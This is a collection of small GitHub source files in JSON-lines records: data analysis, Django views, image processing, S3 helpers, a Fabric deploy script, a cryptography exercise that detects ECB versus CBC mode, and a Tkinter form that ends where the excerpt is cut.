{"seq_id":"43064141041","text":"#!/usr/bin/python\n#coding=utf-8\n#encoding=utf8\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nimport pandas as pd\n\nif __name__ == '__main__':\n user_name = '雾里看花113'\n df = pd.read_csv('data/all_order.csv',encoding='utf-8')\n nomissing_df = df.dropna().reset_index(drop=True)\n spec_df = nomissing_df[nomissing_df['member_nick_name']==user_name].copy()\n spec_df['order_create_time'] = pd.to_datetime(spec_df['order_create_time'])\n spec_df.sort_values('order_create_time',inplace=True)\n spec_df.to_csv('user_specific/'+user_name+'_order.csv',encoding='utf_8_sig',index=False)","repo_name":"forevergogi/bias_svd_with_numpy","sub_path":"utils/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"72182518827","text":"from django.shortcuts import render, redirect\nfrom . 
forms import SignupForm\n\n\n# Create your views here.\ndef signup(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/home')\n else:\n form = SignupForm()\n context = {'form': form}\n return render(request, 'registration/register.html', context)\n","repo_name":"jubins/Cornershop-Meals","sub_path":"cornershopmeals/employees/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70519705707","text":"from django.shortcuts import render, redirect, get_object_or_404\r\n\r\nfrom django.http import HttpResponse, Http404\r\n\r\nfrom handstats.models import *\r\n\r\ndef existing_decks(request):\r\n\tcontext = {}\r\n\t\r\n\tif 'hero' in request.GET and request.GET['hero'] != '':\r\n\t\tdecks = Deck.objects.filter(hero=request.GET['hero'])\r\n\t\tcontext['decks'] = decks\r\n\t\tcontext['selectable'] = True\r\n\t\treturn render(request, 'decks.json', context, content_type='application/json')\r\n\telse:\r\n\t\tdecks = Deck.objects.order_by('hero')\r\n\t\tcontext['decks'] = decks\r\n\t\tcontext['selectable'] = False\r\n\t\treturn render(request, 'existing_decks.html', context)\r\n\t\r\n\t\r\ndef create_deck(request):\r\n\tcontext = {}\r\n\treturn render(request, 'create_deck.html', context)\r\n\t\r\ndef get_deck_list(request, deck_id):\r\n\tdeck = get_object_or_404(Deck, id=deck_id)\r\n\t\r\n\tcontext = {}\r\n\tcontext['deck'] = deck\r\n\t\r\n\treturn render(request, 'deck_list.html', context)\r\n\t\r\n\t","repo_name":"ValentinMoullet/hearthstone","sub_path":"hearthstone/handstats/decks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32373039853","text":"n = int(input())\na = list(map(int, input().split()))\na.insert(0, 0)\n\ninf = 1000000000\n\ndp = [[inf for col in range(4)] for row in range(n+1)]\nprv = [[0 for col in range(4)] for row in range(n+1)]\n\ndp[0][0] = 1\nfor i in range(1, n+1):\n for j in range(0, 4):\n if dp[i-1][j] <= a[i] and dp[i][j] > a[i]:\n dp[i][j] = a[i]\n prv[i][j] = j\n if j > 0 and dp[i][j] > dp[i-1][j-1]:\n dp[i][j] = dp[i-1][j-1]\n prv[i][j] = j-1\n\nisFinished = False\nfor ti in range(0, 4):\n if dp[n][ti] == inf:\n continue\n print(\"YES\")\n print(ti)\n i, j = n, ti\n while i > 0:\n if prv[i][j] == j-1:\n print(i, dp[i][j])\n j = prv[i][j]\n i -= 1\n isFinished = True\n break\n\nif not isFinished:\n print(\"NO\")","repo_name":"justiceHui/Sunrin-Contest","sub_path":"Sunrin-ICPC-2021/Final-A/FA.py","file_name":"FA.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"40184969478","text":"def car_info(manufacturer, model, **features):\n \"\"\"Building a car dictionary to store various cars and their features\"\"\"\n car_profile = {}\n car_profile[\"manufacturer\"] = manufacturer\n car_profile[\"model\"] = model\n for k, v in features.items():\n car_profile[k] = v\n return car_profile\n\n\ntoyota = car_info(\"toyota\", \"camry\",\n year=2014,\n color=\"black\",\n navigation=\"yes\",\n rear_camera=\"yes\",\n price=21000)\n\nprint(toyota)\n 
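\n# An extra, purely illustrative call with made-up values, showing that **features\n# accepts any number of keyword arguments and copies each one into the returned dict:\nhonda = car_info(\"honda\", \"civic\", year=2020, color=\"blue\")\nprint(honda)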
\n","repo_name":"ojenksdev/python_crash_course","sub_path":"car_build.py","file_name":"car_build.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2230766710","text":"#! /bin/python3\nimport socketserver\nimport http.server\n\nclass MyHTTP(http.server.SimpleHTTPRequestHandler):\n def handle_one_request(self):\n print(self)\n print(self.client_address[0])\n return super().handle_one_request()\nhttpd = socketserver.TCPServer((\"\", 8000), MyHTTP)\n\nprint(\"Now serving HTTP server on port 8000\")\n\nwhile True:\n httpd.handle_request()\n","repo_name":"Cmorling/MySimpleHTTPServer","sub_path":"SimpleHTTPExtension.py","file_name":"SimpleHTTPExtension.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3896516420","text":"# coding: utf-8\nfrom datetime import datetime\nfrom snowballing.models import *\nfrom ..places import *\n\no2005a = DB(Work(\n 2005, \"A decentralised approach to electronic consent and health information access control\",\n due=\"unrelated to GDPR\",\n display=\"o\",\n authors=\"O'Keefe, Christine M and Greenfield, Paul and Goodchild, Andrew\",\n place=JRPIT,\n ID='o2005decentralised',\n category='unrelated',\n cluster_id='13336104715367539653',\n entrytype='article',\n link='https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.86.4850&rep=rep1&type=pdf',\n number='2',\n pp='161--178',\n scholar='https://scholar.google.com/scholar?cites=13336104715367539653&as_sdt=2005&sciodt=0,5&hl=en',\n scholar_id='xePktpRcE7kJ',\n scholar_ok=True,\n volume='37',\n backward_steps=1,\n))\n","repo_name":"danielpcampagna/master-the-state-of-the-art","sub_path":"database/work/y2005.py","file_name":"y2005.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71157870454","text":"import numpy as np\r\nimport imageio\r\nimport math\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimg = cv2.imread('D:\\\\hough.jpg',0)\r\nwidth, height = img.shape\r\ndiaglen = int(round(math.sqrt(width * width + height * height)))\r\n\r\ndef hough_line(img):\r\n thetas = np.deg2rad(np.arange(-90.0, 90.0, 1))\r\n width, height = img.shape\r\n diaglen = int(round(math.sqrt(width * width + height * height)))\r\n rs = np.linspace(-diaglen, diaglen, diaglen * 2)\r\n cost = np.cos(thetas)\r\n sint = np.sin(thetas) \r\n accumulator = np.zeros((2 * diaglen, len(thetas)), dtype=np.uint8)\r\n y_id, x_id = np.nonzero(img)\r\n for i in range(len(x_id)):\r\n x = x_id[i]\r\n y = y_id[i]\r\n for teta in range(len(thetas)):\r\n r = diaglen + int(round(x * cost[teta] + y * sint[teta]))\r\n accumulator[r, teta] += 1\r\n return accumulator, thetas, rs\r\n\r\ndef sobel(img):\r\n# define gaussian kernels\r\n ksv=[[1,0,-1],[2,0,-2],[1,0,-1]]\r\n ksh=[[1,2,1],[0,0,0],[-1,-2,-1]]\r\n\r\n###################sobel edge detection######################################\r\n# function for convolution.\r\n def convolu(ker):\r\n ksf=[[0 for j in range(len(ker[0]))] for i in range(len(ker))] \r\n \r\n#flipping the kernel\r\n for i in range(len(ker)):\r\n for j in range(len(ker[0])):\r\n ksf[i][j]=ker[len(ker)-i-1][len(ker)-j-1] \r\n \r\n#convolution \r\n res=[[0 for j in range(len(gray[0]))] for i in range(len(gray))]\r\n kh=len(ksf)//2\r\n kw=len(ksf[0])//2\r\n ih=len(gray)\r\n iw=len(gray[0])\r\n for i in range(kh,ih-kh):\r\n for j in 
range(kw,iw-kw):\r\n x=0\r\n for l in range(len(ksf)):\r\n for k in range(len(ksf[0])):\r\n x = x+ gray[i-kh+l][j-kw+k]*ksf[l][k] \r\n res[i][j]=x \r\n return res \r\n\r\n#method 2 for eliminating zeros\r\n def eliminate2(resl):\r\n for i in range(len(resl)):\r\n resl[i]=[abs(j) for j in resl[i]]\r\n maximum = max([max(j) for j in resl])\r\n for i in range(len(resl)):\r\n resl[i][:] = [x / maximum for x in resl[i]]\r\n return resl\r\n gray = img \r\n reslh=convolu(ksh) \r\n reslv=convolu(ksv)\r\n reslho = eliminate2(reslh)\r\n reslho = np.asarray(reslho)\r\n reslve = eliminate2(reslv) \r\n reslve = np.asarray(reslve)\r\n for i in range(len(reslve)): \r\n for j in range(len(reslve[0])):\r\n if(reslve[i][j]>0.1):\r\n reslve[i][j] = 1\r\n else:\r\n reslve[i][j] = 0\r\n return reslve,reslho\r\n\r\n###################MAIN FOR LINES#################################################################\r\naccu = []\r\nimgpath = 'D:\\\\hough.jpg'\r\ntran = imageio.imread(imgpath) \r\ntran1 = imageio.imread(imgpath)\r\nimg = cv2.imread('D:\\\\hough.jpg',0) #read image as as gray\r\nimg,reslho = sobel(img)\r\ncv2.imshow('imcan.png',img) \r\naccumulator, thetas, rhos = hough_line(img)\r\nprint(accumulator)\r\nprint('over')\r\nprint(img.shape)\r\nfor i in range(len(accumulator)):\r\n for j in range(len(accumulator[0])):\r\n if(accumulator[i][j]>195):\r\n accu.append([thetas[j],rhos[i]])\r\naccu = np.asarray(accu)\r\nprint(accu)\r\n\r\nfor theta,r in accu: \r\n a = np.cos(theta) \r\n b = np.sin(theta) \r\n x0 = a*r \r\n y0 = b*r \r\n x1 = int(x0 + 2000*(-b)) \r\n y1 = int(y0 + 2000*(a)) \r\n x2 = int(x0 - 2000*(-b)) \r\n y2 = int(y0 - 2000*(a)) \r\n# thetamap = np.deg2rad(theta)\r\n if(-2.10865238e-01<=theta<=2.10865238e-01):\r\n cv2.line(tran,(x1,y1), (x2,y2), (0,0,255),2)\r\n else:\r\n cv2.line(tran1,(x1,y1), (x2,y2), (255,0,0),2)\r\n \r\ncv2.imwrite('D:\\\\red_lines.jpg', tran) \r\ncv2.imwrite('D:\\\\blue_lines.jpg', tran1)\r\n\r\n\r\n############################# CIRCLE DETECTION ######################################################################\r\n\r\ndef detectCircles(img,threshold,region,radius = None):\r\n (M,N) = img.shape\r\n if radius == None:\r\n R_max = np.max((M,N))\r\n R_min = 3\r\n else:\r\n [R_max,R_min] = radius\r\n\r\n R = R_max - R_min\r\n A = np.zeros((R_max,M+2*R_max,N+2*R_max))\r\n B = np.zeros((R_max,M+2*R_max,N+2*R_max))\r\n theta = np.arange(0,360)*np.pi/180\r\n edges = np.argwhere(img[:,:]) \r\n for val in range(R):\r\n r = R_min+val\r\n bprint = np.zeros((2*(r+1),2*(r+1)))\r\n (m,n) = (r+1,r+1) \r\n for angle in theta:\r\n x = int(np.round(r*np.cos(angle)))\r\n y = int(np.round(r*np.sin(angle)))\r\n bprint[m+x,n+y] = 1\r\n constant = np.argwhere(bprint).shape[0]\r\n for x,y in edges: \r\n X = [x-m+R_max,x+m+R_max] \r\n Y= [y-n+R_max,y+n+R_max] \r\n A[r,X[0]:X[1],Y[0]:Y[1]] += bprint\r\n A[r][A[r]17):\r\n circle.append(plt.Circle((y,x),r,color=(1,0,0),fill=False))\r\n fig.add_subplot(111).add_artist(circle[-1])\r\n plt.show()\r\n plt.savefig('D:\\\\coin.jpg')\r\n \r\n############################################main for circles######################################### \r\nfile_path = 'D:\\\\hough.jpg'\r\nres = img \r\nfor i in range(len(reslho)): \r\n for j in range(len(reslho[0])):\r\n if(reslho[i][j]>0.1):\r\n res[i][j] = 1\r\n else:\r\n res[i][j] = 0\r\n\r\nres = detectCircles(res,11,20,radius=[50,15])\r\ndisplayCircles(res)\r\n\r\n","repo_name":"srujan-kothapally/Morphology_Image-segmentation_point-detection_Hough-transform","sub_path":"Hough transform/proj3 
task3.py","file_name":"proj3 task3.py","file_ext":"py","file_size_in_byte":6211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3542265116","text":"import boto3\n\nsession =boto3.Session(profile_name=\"aws_root\")\n\ndef get_client():\n s=session.resource('s3')\n return s\n\ndef list_s3_buckets():\n\n s= get_client()\n\n for bucket in s.buckets.all():\n print(bucket.name)\n\ndef list_s3_objects(bucket):\n\n s= get_client()\n bucket = s.Bucket(bucket)\n ob=[]\n\n for o in bucket.objects.all():\n ob.append(o.key)\n return (ob)\n\ndef put_object_to_s3(key,body):\n s = get_client()\n #s.Bucket('ayush-third-bucket').put_object(Key='beta2', Body='beta2file')\n s.Bucket('ayush-third-bucket').put_object(Key=key, Body=body)\n return(key)\n\nlist_s3_objects('ayush-third-bucket')\n#put_object_to_s3('beta3','beta3file')","repo_name":"ayushkr07/boto-moto","sub_path":"mycode.py","file_name":"mycode.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23792746515","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 5 13:12:45 2021\n\n@author: mhz\n\"\"\"\n\n# Density and porosity because no neutron, but it has a color map\nfig = plt.subplots(figsize=(7,10))\n\nax1 = plt.subplot2grid((1,1), (0,0), rowspan=1, colspan=1)\nax2 = ax1.twiny()\n\nax1.plot('RHOB', 'DEPTH', data=df, color='red', lw=0.5)\nax1.set_xlim(1.44, 2.8)\nax1.set_xlabel('Density')\nax1.xaxis.label.set_color(\"red\")\nax1.tick_params(axis='x', colors=\"red\")\nax1.spines[\"top\"].set_edgecolor(\"red\")\n\nax2.plot('CNPOR', 'DEPTH', data=df, color='blue', lw=0.5)\nax2.set_xlim(58, 1.6)\nax2.set_xlabel('Porosity (%)')\nax2.xaxis.label.set_color(\"blue\")\nax2.spines[\"top\"].set_position((\"axes\", 1.08))\nax2.tick_params(axis='x', colors=\"blue\")\nax2.spines[\"top\"].set_edgecolor(\"blue\")\n\nx1=df['RHOB']\nx2=df['CNPOR']\n\nx = np.array(ax1.get_xlim())\nz = np.array(ax2.get_xlim())\n\nnz=((x2-np.max(z))/(np.min(z)-np.max(z)))*(np.max(x)-np.min(x))+np.min(x)\n\nax1.fill_betweenx(df['DEPTH'], x1, nz, where=x1>=nz, interpolate=True, color='green')\nax1.fill_betweenx(df['DEPTH'], x1, nz, where=x1<=nz, interpolate=True, color='yellow')\n\nfor ax in [ax1, ax2]:\n ax.set_ylim(4400, 2500)\n ax.xaxis.set_ticks_position(\"top\")\n ax.xaxis.set_label_position(\"top\")","repo_name":"MhzQa/PETE_219_GROUP_PROJ","sub_path":"Density And Porosity logs.py","file_name":"Density And Porosity logs.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23024052113","text":"from fabric.api import local, run, env, put\nenv.graceful = False\n\nenv.user = 'mushfiq'\nenv.site_root = '/var/www/news'\n\ndef server():\n\n # env.serverpath = ''\n\n # env.password = '' #ssh password for user \n # env.key_filename = ''# specify server public key\n #lis of hossts in env.hosts\n env.hosts = [\n 'shironambd.com',\n ]\n \n env.graceful = False\n\n \n#sample method for git pull\ndef pull(branch_name):\n\tenv.site_root = 'your_project_path'\n\trun('cd %s && git pull origin %s' % (env.site_root, branch_name))\n \n#deploy current directories all code without fabfile.py\t\ndef deploy():\n\tenv.files = '*'\n\tenv.site_name = 'shironambd'\n\tenv.site_path = '/var/www/news'\n\trun('sudo rm -rf %s/%s' % (env.site_path,env.site_name))\n\tlocal('zip -r %s.zip -x=fabfile.py %s' % 
(env.site_name, env.files))\n\tput('%s.zip' % env.site_name, env.site_root, use_sudo=True)\n\trun('cd %s && sudo unzip %s.zip -d %s && sudo rm %s.zip' % (env.site_root, \\\n\tenv.site_name, env.site_name, env.site_name))\n\tlocal('rm -rf %s.zip' % env.site_name)\n\t\n\t\n#restart apache of remote host\ndef restart_apache():\n cmd = \"/usr/local/apache2/bin/apachectl -k graceful\" if (env.graceful is True) \\\n else \"service httpd restart\"\n run(cmd)\n \ndef latest_access_log():\n\tcmd = \"sudo tail -n 10 /var/log/apache2/access.log\"\n\trun(cmd)\n\t\ndef latest_error_log():\n\tcmd = \"sudo tail -n 10 /var/log/apache2/error.log\"\n\trun(cmd)\n\t\ndef clone():\n\tgit_path = \"git@github.com:mushfiq/shironambd.git\"\n\trun('cd /var/www/testFab && git clone %s' % git_path)\n","repo_name":"mushfiq/shironambd","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"73601156211","text":"n, a, b, c = map(int, input().split())\n# dp[i] = max number of pieces of length a, b or c that sum to i; -1 marks unreachable lengths\ndp = [-1] * (n + 1)\ndp[0] = 0\nfor i in range(1, n + 1):\n for cut in (a, b, c):\n if i >= cut and dp[i - cut] >= 0:\n dp[i] = max(dp[i], dp[i - cut] + 1)\nprint(dp[n])","repo_name":"Fahad-CSE16/ProblemSolving","sub_path":"189a.py","file_name":"189a.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"42863738141","text":"import datetime\r\nimport random\r\ndef printTimeStamp(name):\r\n print(\"Program author: \" + name)\r\n print(\"Compilation time: \" + str(datetime.datetime.now()),\"\\n\")\r\nprintTimeStamp(\"Kharchenko Vasil\")\r\n\r\n\r\ndef пароль(): # \"password\"\r\n пас = ('')\r\n for i in range(random.randint(8,17)):\r\n пас += chr(random.randint(33, 127))\r\n print(пас.encode(\"ascii\"))\r\n\r\nfor i in range(10):\r\n пароль()\r\n\r\n\r\n\r\n","repo_name":"ForemanAqua/PythonFiles1","sub_path":"Практика2018/3 den/Уровень А/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"20227648991","text":"import utils\nfrom random import randint\n\nBLOCKSIZE = 16\n\ndef encryption_oracle(plain):\n\tprefix = utils.randomString(randint(5, 10))\n\tsuffix = utils.randomString(randint(5, 10))\n\tif randint(0, 1) == 0:\n\t\treturn utils.AES_ECB_encrypt(utils.randomString(BLOCKSIZE), prefix + plain + suffix), \"ECB\"\n\telse:\n\t\treturn utils.AES_CBC_encrypt(utils.randomString(BLOCKSIZE), utils.randomString(BLOCKSIZE), prefix + plain + suffix), \"CBC\"\n\t\nfor idx in range(10):\n\tcipher, method = encryption_oracle(b\"A\"*43)\n\t\n\tif cipher[BLOCKSIZE:BLOCKSIZE*2] == cipher[BLOCKSIZE*2:BLOCKSIZE*3]:\n\t\tmethodGuess = \"ECB\"\n\telse:\n\t\tmethodGuess = \"CBC\"\n\t\t\n\tprint(methodGuess == method)\n\t","repo_name":"max644/matasano","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"30116845052","text":"import os\n\nfrom django.conf import settings\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views import View\n\nfrom cyberdevice.accountUtils import get_access_token\n\n# load da list\ndef get_da_list():\n dirs = os.listdir(os.path.join('', 'cyberdevice/templates/da'))\n return [da.replace('.html', '') for da in dirs if '.html' in da]\n\n# 
load vp list\ndef get_vp_list():\n return os.listdir(os.path.join('', 'cyberdevice/static/vp'))\n\n\nclass Index(View):\n template_name = 'cyberdevice/index.html'\n\n def get(self, request, *args, **kwargs):\n return render(\n request,\n self.template_name,\n {\n 'da_list': get_da_list(),\n 'vp_list': get_vp_list(),\n }\n )\n\n\nclass EcEndpoint(View):\n def get(self, request, *args, **kwargs):\n return JsonResponse({\"ec_endpoint\": settings.EC_ENDPOINT})\n\n\nclass CyberDevice(View):\n template_name = 'da/{}.html'\n\n def _render(self, request, da_name):\n return render(\n request,\n self.template_name.format(da_name),\n {\n 'da_name': da_name,\n 'ec_endpoint': settings.EC_ENDPOINT,\n 'ag_endpoint': settings.AG_ENDPOINT,\n 'ag_username': settings.AG_USERNAME,\n 'ag_password': settings.AG_PASSWORD,\n 'ag_access_token': get_access_token(),\n }\n )\n\n def get(self, request, *args, **kwargs):\n da_name = self.kwargs['da_name']\n return self._render(request, da_name)\n\n\nclass VPython(View):\n template_name = 'vp/base.html'\n\n def _render(self, request, vp_name):\n return render(\n request,\n self.template_name,\n {\n 'vp_name': vp_name,\n 'ec_endpoint': settings.EC_ENDPOINT,\n 'ag_endpoint': settings.AG_ENDPOINT,\n 'ag_username': settings.AG_USERNAME,\n 'ag_password': settings.AG_PASSWORD,\n 'ag_access_token': get_access_token(),\n }\n )\n\n def get(self, request, *args, **kwargs):\n vp_name = self.kwargs['vp_name']\n return self._render(request, vp_name)\n\n\nclass Smartphone(View):\n template_name = 'cyberdevice/smartphone.html'\n\n def _render(self, request, do_id):\n return render(\n request,\n self.template_name,\n {\n 'ec_endpoint': settings.EC_ENDPOINT,\n 'do_id': do_id,\n }\n )\n\n def get(self, request, *args, **kwargs):\n return self._render(request, self.kwargs['do_id'])\n","repo_name":"IoTtalk/CyberApplication","sub_path":"cyberdevice/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"28527644162","text":"# | Authors : Remi Jauzion - Oskar Morel |\r\n# |--------------------------------------|\r\n# Algorithm No. 2 for estimating an apartment's price from its surface area: linear regression via gradient descent\r\n\r\n# Computes the partial derivative with respect to a\r\n# x, y : arrays of values\r\n# a, b : initial values\r\n# return : the value of the derivative with respect to a\r\n\r\ndef lesSommes(x, y):\r\n sommeXAuCarre = 0\r\n sommeX = 0\r\n sommeXY = 0\r\n sommeY = 0\r\n sommeYAuCarre = 0\r\n for i in range(len(x)):\r\n sommeXAuCarre = sommeXAuCarre + (x[i] * x[i])\r\n sommeYAuCarre = sommeYAuCarre + (y[i] * y[i])\r\n sommeX = sommeX + x[i]\r\n sommeXY = sommeXY + (x[i] * y[i])\r\n sommeY = sommeY + y[i]\r\n return sommeX,sommeY,sommeXY,sommeXAuCarre, sommeYAuCarre\r\n\r\n\r\n\r\n\r\ndef derivePartielleA(a,b, sommeXAuCarre, sommeX, sommeXY):\r\n resultat = 2 * ((a * sommeXAuCarre) + (b * sommeX) - sommeXY)\r\n return resultat\r\n\r\n# Computes the partial derivative with respect to b\r\n# x, y : arrays of values\r\n# a, b : initial values\r\n# return : the value of the derivative with respect to b\r\ndef derivePartielleB(x,a,b,sommeX,sommeY):\r\n resultat = 2 * (a * sommeX + len(x) * b - sommeY)\r\n return resultat\r\n\r\n# Uses the two partial-derivative routines above\r\n# maxIter : the max number of iterations before the loop stops (so it does not consume too many\r\n# resources or run forever)\r\n# return : a and b as computed by gradient descent\r\n\r\ndef descenteGradient(x,y,maxIter):\r\n\r\n a = 1\r\n b = 1\r\n fctCoutAvant = 0\r\n 
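# fctCoutAvant / fctCoutApres hold the cost before and after each update; compared below to detect an overshooting step\r\n 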
fctCoutApres = 0\r\n\r\n (sommeX,sommeY,sommeXY,sommeXAuCarre, sommeYAuCarre) = lesSommes(x, y)\r\n\r\n pas = 0.0001\r\n fini = False\r\n i = 0\r\n while not fini:\r\n\r\n if (i >= maxIter or (abs(derivePartielleB(x, a, b, sommeX, sommeY)) <= 0.0001 and abs(derivePartielleA(a, b, sommeXAuCarre, sommeX, sommeXY)) <= 0.0001)):\r\n fini = True\r\n\r\n fctCoutAvant = sommeYAuCarre - 2 * a * sommeXY - 2 * b * sommeY + a * a * sommeXAuCarre + 2 * a * b * sommeX + len(\r\n x) * b * b\r\n\r\n a -= derivePartielleA(a,b, sommeXAuCarre, sommeX, sommeXY) * pas\r\n b -= derivePartielleB(x,a,b,sommeX,sommeY) * pas\r\n\r\n fctCoutApres = sommeYAuCarre - 2 * a * sommeXY - 2 * b * sommeY + a * a * sommeXAuCarre + 2 * a * b * sommeX + len(\r\n x) * b * b\r\n\r\n # Halve the step if the cost function is larger after the new gradient step than before\r\n if fctCoutApres > fctCoutAvant:\r\n pas /= 2\r\n\r\n i+=1\r\n return \"a = \" + str(a) + \"\\nb = \" + str(b)\r\n\r\n\r\n","repo_name":"OskarMorel/Oskar_Remi_SAE_Math_S4","sub_path":"src/RegressionLineaireDescenteGradient.py","file_name":"RegressionLineaireDescenteGradient.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"14000317907","text":"import os\nimport argparse\n\nimport numpy as np\nimport ruamel.yaml as yaml\nimport gym\n\nfrom PSDRL.common.data_manager import DataManager\nfrom PSDRL.common.utils import init_env, load\nfrom PSDRL.common.logger import Logger\nfrom PSDRL.agent.psdrl import PSDRL\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\n\ndef run_test_episode(env: gym.Env, agent: PSDRL, time_limit: int):\n current_observation = env.reset()\n episode_step = 0\n episode_reward = 0\n done = False\n while not done:\n action = agent.select_action(current_observation, episode_step)\n observation, reward, done, _ = env.step(action)\n episode_reward += reward\n current_observation = observation\n episode_step += 1\n done = done or episode_step == time_limit\n return episode_reward\n\n\ndef run_experiment(\n env: gym.Env,\n agent: PSDRL,\n logger: Logger,\n test_env: gym.Env,\n steps: int,\n test: int,\n test_freq: int,\n time_limit: int,\n save: bool,\n save_freq: int,\n):\n ep = 0\n experiment_step = 0\n\n while experiment_step < steps:\n episode_step = 0\n episode_reward = 0\n\n current_observation = env.reset()\n done = False\n while not done:\n\n if test and experiment_step % test_freq == 0:\n test_reward = run_test_episode(test_env, agent, time_limit)\n logger.log_episode(\n experiment_step, train_reward=np.nan, test_reward=test_reward\n )\n\n action = agent.select_action(current_observation, episode_step)\n observation, reward, done, _ = env.step(action)\n done = done or episode_step == time_limit\n agent.update(\n current_observation,\n action,\n reward,\n observation,\n done,\n ep,\n experiment_step,\n )\n\n episode_reward += reward\n current_observation = observation\n episode_step += 1\n experiment_step += 1\n \n if ep and save and experiment_step % save_freq == 0:\n logger.data_manager.save(agent, experiment_step)\n ep += 1\n logger.log_episode(\n experiment_step, train_reward=episode_reward, test_reward=np.nan\n )\n\n\n\ndef main(config: dict):\n data_manager = DataManager(config)\n logger = Logger(data_manager)\n exp_config = config[\"experiment\"]\n\n env, actions, test_env = init_env(\n exp_config[\"suite\"], exp_config[\"env\"], exp_config[\"test\"]\n )\n\n agent = PSDRL(config, actions, logger, config[\"experiment\"][\"seed\"])\n if config[\"load\"]:\n load(agent, 
config[\"load_dir\"])\n\n run_experiment(\n env,\n agent,\n logger,\n test_env,\n exp_config[\"steps\"],\n exp_config[\"test\"],\n exp_config[\"test_freq\"],\n exp_config[\"time_limit\"],\n config[\"save\"],\n config[\"save_freq\"],\n )\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=str, default=\"./src/config.yaml\")\n parser.add_argument(\"--env\", type=str, required=True)\n parser.add_argument(\"--seed\", type=int, default=None)\n\n args = parser.parse_args()\n\n with open(args.config, \"r\") as f:\n config = yaml.safe_load(f)\n config[\"experiment\"][\"env\"] = args.env\n config[\"experiment\"][\"seed\"] = args.seed\n\n main(config)\n","repo_name":"remosasso/PSDRL","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"29029447525","text":"#\n# 信号量对象是同步原语一种,也就是PV操作\n# 在python中,使用acquire()和release()维护一个计数器\n# 当acquire()方法小于0时,会进入阻塞状态\n\n\n# 在这里个例子中,由于启用了多线程,所以是运行Two方法其次是Two方法\n# 由于未定义先后顺序,所以在子线程进入阻塞状态后,主线程会抢先运行\n# join方法表示需要等待被调用线程完成执行\n\nimport threading\nimport time\n\n# 从线程对象创建线程\nstart = time.time()\ndef targetMethodOne():\n # for i in range(100):\n time.sleep(1)\n print(targetMethodOne.__name__)\n\n\ndef targetMethodTwo():\n # for i in range(100):\n time.sleep(0.5)\n print(targetMethodTwo.__name__)\n\nthreadTargetMethodOne = threading.Thread(target=targetMethodOne)\nthreadTargetMethodTwo = threading.Thread(target=targetMethodTwo)\n\nthreadTargetMethodOne.start()\nthreadTargetMethodTwo.start()\n\n# 在这里调用join方法,保证主线程最后执行\n# 需要注意的是,这行代码需要放在start之后,例如One方法的start和join连用,表示需等待One执行完再执行Two方法\nthreadTargetMethodOne.join()\nthreadTargetMethodTwo.join()\n\nend = time.time()\n\nprint(\"用时 {} 秒\".format(end - start))","repo_name":"luckywyy/pythonbasic_git","sub_path":"pythonbasic/python官网文档/线程/信号量对象/信号量对象.py","file_name":"信号量对象.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41559480798","text":"import tempfile\r\nimport os\r\nfrom tkinter import *\r\nimport tkinter.messagebox\r\n\r\nroot=Tk()\r\nroot.title(\"Personal Details\")\r\nroot.geometry(\"480x530+0+0\")\r\nroot.config(bg=\"light 